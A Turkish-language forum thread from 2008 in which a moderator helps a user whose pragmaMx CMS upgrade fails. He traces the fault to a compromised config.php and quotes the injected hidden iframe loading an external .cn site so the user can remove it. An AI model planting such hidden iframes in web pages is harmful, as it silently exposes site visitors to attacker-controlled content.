[Çözüldü] pragmaMx 0.1.9 dan pragmax 0.1.10 a yukseltme hatası

Begonnen von rumeysa1, 29 April 2008, 16:36:05

⏪ vorheriges - nächstes ⏩

rumeysa1

kurulumu yaparken dılı sectıkten sonra byaz sayfa cıkıyor htayı nerde yapmıs olabılırım???

navruz

Merhaba :)

Tüm kurulum dosylarını attığınızdan emin olun.
Destek için forumu kullanın. Özel mesaj atmayın.

pragmaMx Türkiye

rumeysa1

oncelıkle ılgınıze tsk ederım  dosyaları atarken ftp cliente ne olur ne oomaz dıye klasorler halınde tek tek attım ama kurulumda dıl secenegınden sonrası gelmıyor

navruz

setup klasörünü yeniden atın isterseniz bir de öyle deneyin. Olmazsa gözatabileceğimiz bir link verin.

pragmaMx Türkiye

rumeysa1

navruz

config.php dosyanızı kontrol edermisiniz. Hata o dosyada. Bu dosyanın yedeği varsa geri yükleyin.

pragmaMx Türkiye

rumeysa1

yukledim ama yıne aynı confin.php uzerınde nasıl bı degısıklık yapmalıyım yada ole bı degısıklık soz konusumu???

navruz

Değişiklik yapmanıza gerek yok normal şartlarda. Fakat config.php değiştirilmiş gördüğüm kadarıyla. Özel mesaj yoluyla config.php dosyanızın içindeki verileri atabilirseniz bir göz atayım.

pragmaMx Türkiye

navruz

Muhtemelen bir saldırı almışsınız ve config.php dosyanız değiştirilmiş.

<?php ifadesinden sonra yer alan <IFRAME name='yeeeahhhh'  src='http://www.colehost.cn' width=5 height=5 style='display:none'></IFRAME> bölümünü silin, kaydedin ve sunucunuza atın. Sorun hallolacaktır.

pragmaMx Türkiye

rumeysa1

evet duzelttım ama bu seferde db hatası verdı  :mad2:
sanada bayagı ezıyet ettım bugun artık kusuruma bakmassın  :red:

navruz

pragmaMx Türkiye

rumeysa1

tsk ederım sorunu cozduk ama guzel bı saldırı olmus ana sayfada sureklı yenılmee ve baska bı adrese yonlendırme var ben temızleyebıldıklerımı temızledım am genede aynı
:mad2: